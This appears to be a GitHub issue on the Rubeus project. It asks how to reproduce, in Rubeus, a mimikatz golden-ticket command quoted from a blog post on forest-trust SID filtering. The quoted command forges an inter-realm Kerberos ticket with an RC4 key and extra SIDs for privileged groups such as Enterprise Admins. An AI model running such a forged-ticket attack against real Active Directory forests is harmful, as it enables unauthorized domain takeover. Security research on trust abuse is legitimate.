-
Notifications
You must be signed in to change notification settings - Fork 828
Description
In this article https://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/ , when trusts between forests has flag TREAT_AS_EXTERNAL, we can generate ticket with extrasids >1000 .
Author generate this ticket with mimikatz:
kerberos::golden /domain:forest-a.local /sid:S-1-5-21-3286968501-24975625-1618430583 /rc4:b8e9b4b3feb56c7ba1575bf7fa3dc76f /user:Superuser /target:forest-b.local /service:krbtgt /sids:S-1-5-21-3286968501-24975625-1618430583-1604,S-1-5-21-3286968501-24975625-1111111111-1605,S-1-18-1,S-1-5-21-2897307217-3322366030-3810619207-1106,S-1-5-21-2897307217-3322366030-3810619207-512,S-1-5-21-2897307217-3322366030-3810619207-519,S-1-5-21-2897307217-3322366030-3810619207-548,S-1-5-21-2897307217-3322366030-3810619207-3101
How i can generate this ticket with Rubeus? I do not see option /target:forest-b.local